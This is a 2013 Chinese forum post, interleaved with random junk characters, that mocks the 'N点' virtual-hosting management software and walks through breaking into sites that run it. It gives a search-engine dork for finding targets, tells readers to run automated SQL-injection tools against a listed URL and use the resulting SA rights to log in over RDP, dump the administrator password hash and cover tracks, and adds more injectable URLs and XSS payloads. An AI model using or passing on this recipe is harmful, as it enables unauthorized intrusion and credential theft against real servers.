不得不说N点实在是一个破东西: |7 f0 X! u; b) p( x
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
( x7 s, Z2 G. A2 J好吧 抱怨一下就行了 接下来关键的时候到了% p( q, j6 ^8 j# Z' }1 T
首先百度搜索关键字:inurl: (mmdatabase.asp)) U5 n, N, }5 c& G8 Y0 D. [
我随便列举一个: www.xxxx.com
% I$ H, {, T/ D修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
- T q& Y9 k. s; |$ R% j9 h" h扔入NBSI 或者啊D等各种傻逼工具后% u' L9 k2 M; n- P$ m; A
你们会看到是SA权限
9 s0 W- n q1 i. W3 r0 y! v) _果断3389 上去 hash得到administrator密码+ c' \ O; k: g j. F5 X
擦屁股走人~
5 _# q2 M3 b8 G9 Y- O2 V经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的1 b; \0 w% o U/ t- `5 |' k9 q
1 @8 _: F7 ]: k- M再附上其他几个漏洞页面
2 u" R9 K% p6 i$ I, i! xSQL:! `- D4 V: k6 M
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1/ U0 G* J) i3 i
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11; m; k2 H; y m% {* P
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9. q' x1 W R8 @$ k: @% N! M
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2; g# X0 J: z+ P, Q
XSS证明:
' U k8 ?1 v' x; v, r; q$ Whttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);” o" q! b3 V$ H) b" {. z
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
4 Q- c: n; b4 x0 C) X2 m; [http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>+ b! H4 j' l8 X, R1 A! d( w
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜2 `. V0 q8 I) {/ ~) I6 Y
还是星外吧 你们懂的" L& L& @' l3 C+ r3 V k) d' ]4 W4 _% f
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?' ~7 _/ z$ }& e9 U$ C4 X D& C0 E
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉* Y/ @1 x1 X' [) u
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对